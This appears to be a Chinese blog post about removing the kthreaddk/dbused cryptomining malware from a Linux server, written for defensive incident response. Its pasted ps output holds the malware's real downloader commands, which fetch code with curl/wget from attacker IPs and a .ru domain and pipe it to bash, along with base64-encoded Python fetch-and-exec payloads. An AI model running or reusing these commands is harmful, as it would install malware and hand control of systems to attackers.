处理挖矿病毒kthreaddk的过程

发布时间 2023-11-29 11:16:14作者: 没刮胡子

问题描述

发现服务器的 CPU 和内存占用非常高，用 top 查看后发现有几个异常的进程：


  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                               
12043 root      20   0 2443988   2.3g      4 S 100.3 15.1   9:12.96 dbused                                                                                                
13556 root      20   0 2441068   2.3g   1408 S  99.7 15.1   5:05.31 kthreaddk  

然后再次执行

ps -ef

[root@serve1 ~]# ps -ef |grep http://
root      6262  6261  0 Jan06 ?        00:00:00 sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin; (curl -s http://185.106.94.146/xms || wget -q -O - http://185.106.94.146/xms || lwp-download http://185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms
root      6476 11610  0 Jan23 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo 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 | base64 -d | bash -
root      8570  8569  0 Jan06 ?        00:00:00 sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin; (curl -s http://185.106.94.146/xms || wget -q -O - http://185.106.94.146/xms || lwp-download http://185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms
root     14491 14121  0 09:22 pts/0    00:00:00 grep --color=auto http://
root     15581 11610  0 Jan22 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo 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 | base64 -d | bash -
root     16484 16467  0 Jan02 ?        00:00:00 bash /tmp/.dat http://194.38.23.170/bashirc.x86_64
root     19015 11610  0 Jan26 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo 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 | base64 -d | bash -
root     19230 19017  0 Jan26 ?        00:00:00 curl -k http://dw.bpdeliver.ru/x86_64 -o /tmp/dbused
root     22662 11610  0 Jan26 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo 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 | base64 -d | bash -
root     22735 11610  0 Jan26 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo 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 | base64 -d | bash -
root     24207 11610  0  2022 ?        00:00:00 /bin/bash -c (curl -s http://194.38.23.170/xms || wget -q -O - http://194.38.23.170/xms || lwp-download http://194.38.23.170/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMzguMjMuMTcwL2QucHkiKS5yZWFkKCkpJw== | base64 -d | bash -; echo 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 | base64 -d | bash -
root     28928  2920  0 Feb16 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo 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 | base64 -d | bash -

发现服务器已经被搞得不成样子了。

解决方案

首先杀死进程

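# Force-kill the miner processes by PID. These PIDs are the ones observed on
# this host at the time (12043 is the dbused process in the top output above);
# look up the current PIDs with top/ps before reusing this on another machine.
kill -9 12043 12203 12202 12047 12048 12049
# Kill any remaining process whose command line matches kthreaddk.
# The original line read "plill", which is not a command; pkill is intended.
# NOTE(review): the curl/wget downloader shells listed by ps above are matched
# by neither command (different PIDs, no "kthreaddk" in their command line).
pkill -f kthreaddk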

删除临时文件

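# Remove everything under the temp directories, including hidden entries.
# A bare /tmp/* glob skips dotfiles, and the ps output above shows a script
# running from /tmp/.dat, so the dotfile patterns are needed to remove it.
# NOTE(review): this also destroys the samples; copy or hash them first if the
# incident needs to be analysed or reported.
rm -rf -- /tmp/* /tmp/.[!.]* /tmp/..?*
rm -rf -- /var/tmp/* /var/tmp/.[!.]* /var/tmp/..?*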

然后重启计算机

# Restart the host. This ends every running process, including the downloader
# shells still listed by ps, but it does not remove whatever launched them.
# NOTE(review): the "xms?cron" URLs in the ps output suggest a scheduled job;
# check the crontabs before treating the reboot as the fix.
reboot

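然后发现系统恢复正常了。

需要注意：上面 ps 输出中的下载命令带有 `?cron` 参数，并且不同日期启动的多条命令有同一个父进程（11610），说明很可能存在定时任务之类的持久化机制。仅仅杀进程、清空临时目录并重启并不能清除它，过一段时间可能再次出现。还应检查 root 及其他用户的 crontab（`crontab -l`、/etc/cron.d、/var/spool/cron）、~/.ssh/authorized_keys、systemd 服务和开机启动脚本，并排查最初的入侵入口（弱口令、未授权访问的服务等）。由于恶意程序是以 root 身份运行的，最稳妥的做法是备份数据后重装系统，并更换所有密码和密钥。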